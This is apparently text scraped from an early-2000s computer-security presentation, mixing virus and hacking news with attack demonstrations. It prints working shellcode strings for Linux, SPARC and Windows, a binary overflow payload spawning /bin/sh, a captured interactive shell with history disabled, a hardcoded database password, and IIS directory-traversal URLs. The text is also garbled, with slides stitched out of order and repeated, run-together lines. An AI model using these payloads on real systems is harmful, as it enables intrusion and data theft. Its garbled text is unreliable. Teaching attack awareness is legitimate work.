#> rlogin -l root tgtsunprod2 last login: tue jul 3 14:52:41 from tgtsunprod1 sun microsystems...
TRANSCRIPT
#> rlogin -l root tgtsunprod2Last login: Tue Jul 3 14:52:41 from tgtsunprod1Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning Government Classified Server ***You have mail.tgtsunprod2 #/usr/sbin/ifconfig -aulo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255 ether 8:0:20:f7:d0:78dhsunprod2 #uname -aSunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80tgtsunprod2 #id
final target compromised
________
___
uid=0(root) gid=1(other)
$ _
Who am I?
The Threat is Active• The blackhat community is
extremely active. – 20+ unique scans a day.– 100% - 900% increase of activity from
2000 to 2001– Its only getting worse
Don't Underestimate Cyberterrorists
Information Security is Information Security is Important …Important …
…because we have so many friends
…because we have so many friends
…because we have so many friends
…because we have so many friends
…because we have so many friends
The Attack
...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-.....
.........hjE.H.o.,B...."Oo...:.....'...i..%._~-...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G@AAAA............AAAAAAAA....................................1....w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A..1...Q[....1.Ph//shh/bin..PS.......
[..]
68.168.1.15:52312 -> 127.0.0.1:443export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.
68.168.1.15:52312 -> 127.0.0.1:443
Doom on You….
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = "http://10.1.1.16/" Set Application("Db") = DbEnd SubSub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan==End Sub</SCRIPT>
User ID: sa
Password: n0t4u2c
Trojan Horse Sept 26, 2001
• Crackers posted a Trojan Horse masquerading as a wu-ftpd exploit on the Vuln-Dev mailing list.
• If the code is compiled and run, it will delete most files on the host’s hard drive
XSS Filter-Bypass Manipulation•This technique is used
pass various types of client-side scripting language through implemented security filters.
•The idea is to be able to achieve client-side execution of a client-side script.
•There are several techniques used to perform this attack.
E-mail Virus Oct 2001
• BP Openworld’s billing department has been sending out the BadTrans virus with its responses to recent e-mail inquiries– The virus launches a Trojan horse in
infected machines– BP Openworld is a subsidiary of British
Telecommunications offering internet services for business and home use
Format String Vulnerabilities
Any call that passes user-supplied input directly to aAny call that passes user-supplied input directly to a*printf()*printf()-family function is dangerous. These calls can-family function is dangerous. These calls canAlso be identified by their argument deficiency.Also be identified by their argument deficiency.Consider this code:Consider this code:
printf(“%s“, userdata);printf(“%s“, userdata);
printf(userdata);printf(userdata); Argument deficiency
Fingerprint Recognition: Sensors (I)
Optical fingerprint sensor[Fingerprint Identification Unit
FIU-001/500 by Sony]
Electro-optical sensor [DELSY® CMOS sensor modul]
Capacitive sensor[FingerTIP™ by Infineon]
Physical Access Controls
• Network Segregation• Perimeter Security• Security Guards• Badge Systems• Biometric Access Controls• Closed Circuit TV Monitoring• Sensors & Alarms
World Trade Center Virus
• The destructive TROJ_VOTE.A e-mail virus exploits the WTC tragedy– It attacks the infected users address
book to spread and send a message about peace between America and Islam
– It also installs two VBS files which attempt to delete the windows directory on reboot
The Threat from the Insider
NIMDA Worm
• The NIMDA worm raced around the world in only 30 minutes when it is was first released in Sept 2001
• Some AV experts recommended disconnecting from the Internet until patches and upgrades could be put into effect.
Iris Recognition
System for passive iris recognition by Sensar
Wireless Attacks• Wireless hacking is an increasing
threat to wired networks– Attackers can penetrate, monitor, and manipulate
data on traditional wired networks by accessing the system through its wireless sub-network.
– The attacker can intercede between two wired hosts behind a firewall, between a wired host and a wireless host, or between two wireless clients
– Uses a “man-in-the-middle” Address Resolution Protocol (ARP) cache poisoning attack.
Attack the Architecture
Java Runtime
WebServer
htmlhandler
html
jsp
text/htmlheader
/bin/sh
includefile
shtml
text/htmlheader
ProcessSSI tags
#exec#include
script/execu--table
ProcessJSP tags
JavaCompiler
class
shtmlhandler
jsphandler
defaulthandler
cgihandler
text/htmlheader
cgish,perl,…
SirCam Worm
• SirCam surfaced in mid-July 2001– Scoops up documents in an infected PC and
mails them to people in the user’s address book
– The most damaging aspect is its ability to enlist dormant viruses in the users’ files and mail them to others
– Result: viruses that might not have spread very far alone get wider distribution and older viruses will get new life
– By Aug 2001, SirCam had infected over 100,000 computers in the US
Viruses – File (Parasitic) Viruses• Simple File Viruses
– After transplanting itself in the executable, the executable often doesn’t work
• Stealth Component– Work very similar
to stealth system sector viruses
• Mask the file size of infected files when a directory listing is done on them
CyberTerrorism – Oct 2001
• The Pakastani hacker group G-Force defaced a US government web site and threatened to turn over “some very high confidential US data” to Al Queada officials if the war on terrorism continues
• This comes days after a government warning of sophisticated and sustained cyberattacks launched by pro-Muslim hacker groups such as G-Force, Doktor Nuker, and the Pakistan Hackerz Club
Redesi Worm – Oct 2001
• An e-mail attachment purporting to be a Microsoft software security patch is actually a worm– It spreads through e-mail– On Nov 11 the worm will reform the c:
drive of infected machines
Discretionary Access Control List (DACL)
• The DACL controls who can access the object and how.
permissions for only one user or one group at a
time
the object's Access Control
Settings
Credit Card Stealing Trojan
• Reported on Oct 29,2001 - Septer– Preying on sympathies for terrorist attack
victims, a credit card stealing trojan horse masquerading as an appeal for donations from the American Red Cross is making the rounds via e-mail
– Users click on the executable attachment and a donation request form loads. If completed, credit card numbers and contact information are saved and uploaded to a Web site.
NT Rootkit
• Rootkit console with Keyboard sniffing
Former Employee Attack
• Wendy Sholds allegedly broke into her former boss’s computer– She forwarded confidential e-mail to
other employees– She used the boss’s username and
password to view private information on the company web site
Security Models
• Security Models– Bell-LaPadula– Biba– Chinese Walls– Clark-Wilson
Hacker Alliance
• Three pro-Islamic hacker groups have joined forces to carry out attacks– Each group is carrying out digital
attacks under a common banner– They are anti-Israel, anti-US/UK, anti-
India
Round 1 Decoding:scripts/..%255c../winntbecomes:scripts/..%5c../winnt(%25 = “%” Character)
Round 2 Decoding:scripts/..%5c../winntbecomes:scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double
Hex Encoding.
IIS Double Hex
USA Today Site Hacked
• The “USA Today” website was defaced with six bogus stories
• The site was taken offline for three hours
Security Testing
• Software will never be placed or deployed into a trusted or predictable environment
• Security testing requires attacking the software in a way that exercises the trust relationships.
• The software should be tested in ways that are unexpected while observing for behaviors that are unknown.
Student Data Exposed
• The permission level to access web logs at Resicom, a telecommunications company that provides intra-campus phone services to colleges was set too low– It allowed people to search for student
names, social security numbers and addresses
Microsoft Misrepresented Security
• A Federal Trade Commission (FTC) investigation found that Microsoft misrepresented both the level of security provided and the amount of data collected by its Passport services– Microsoft agreed to refrain from making
false claims about the information it collects and will submit to an independent audit of its security program every two years.
Programming Satan’s Computer
Cell Phone Virus
• A worm-type virus called Timofonica, hit customers of Spain’s Movistar service– It sends text messages scrolling across the
screens of cellular phones– It is the first virus known to target cell
pones – We can now expect copycat viruses
targeting cell phone and other hand-held devices such as Palm Pilots and Pocket PC computers
Microsoft Breakin
• A hacker broke into BetaPlace.com, Microsoft's web site for betatesters– evidently someone's log-in credentials were leaked to the
Internet. – Microsoft shut down the site after it became aware of the
breach; it also reset user passwords. – The site contains unreleased versions of Windows, other
software and activation keys. – A spokesman said the intruder did not access source
code. The event has sparked a criminal investigation.
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 Methods
Buffer Overflows• Overwrite return address
– Examples of shell-code strings:
LINUX on Intel:char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
SPARC Solaris:char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
Windows:char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45“ “\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03" "\x80\x6D\xF8\x50" "\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\xFF\xD0\x33\xC0\x50\x90” “\xB8" "EXIT" "\xFF\xD0\xC3";
Different Threat Scenarios
1. Regular biometric sensor using artificially generated biometric data
2. Replay attack of eavesdropped biometric data
3. Manipulation of stored biometric reference data
SNMP Management
Normal CAM Behavior III
A A B BMAC BMAC B
MAC CMAC C
MAC AMAC APort Port
11
A A B B
B is on Port 2B is on Port 2
I see do I see do NotNot see traffic to B!see traffic to B!
MACMAC
AA
BB
CC
PortPort
11
22
33
Double Encapsulated 802.1q VLAN Hopping Attack
• Send double encapsulated 802.1Q frames• Switch performs only one level of decapsulation• Unidirectional traffic only• Works even if trunk ports are set to off
Strip off First, and Strip off First, and Send Back outSend Back out
Note: Only works if trunk Note: Only works if trunk has the same native VLAN has the same native VLAN
as the attackeras the attacker
Hacking Cisco
Cisco Bugtraq Vulnerabilities
• 1998 - 3• 1999 - 5• 2000 - 23• 2001 - 46• 2002 (est) - 94
Typical Web Application Set-Up
WebServer
DB
DB
Web app
WebClient Web app
Web app
Web app
HTTPrequest
(cleartext or SSL)
HTTP reply(HTML,
Javascript, VBscript,
etc)
Plugins:•Perl•C/C++•JSP, etc
Database connection:•ADO,•ODBC, etc.
SQL Database
•Apache•IIS•Netscape etc…
Firewall
Traditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.
...winsock_found:
xor eax, eaxpush eaxinc eaxpush eaxinc eaxpush eaxcall socketcmp eax, -1jnz socket_ok
push sockerrlpush offset sockerrcall write_consolejmp quit2
socket_ok:mov sock, eaxmov sin.sin_family, 2mov esi, offset _port
...
NT IIS Showcode ASP Vulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode
asp?source=/msadc/Samples/../../../../../boot.ini
The MDAC AttackClient Server
Internet Explorer
or VB.exe
RDS Data
Control
OBDC Provider
RDS Data
Space
Custom Business Objects
RDS
Data Factory
ASP
(ADO)
Jet Provider Jet
3.5
OBDC
Remote Data Service
URL
HTML
OLE
DB
IIS
Server
Missile of Death
WebServer
DB
DB
Web app
Web app
Web app
Web app
An Example: Brute Forcing Session ID’s in URLS AUTOMATED DEMO!
$8.8 Billion Mistake by Microsoft
• According to Computer Economics, the worldwide economic impact of the Love Bug Virus was estimated at $8.75 billion
• The fact that Microsoft Outlook was designed to execute programs that were mailed to it made the virus possible..
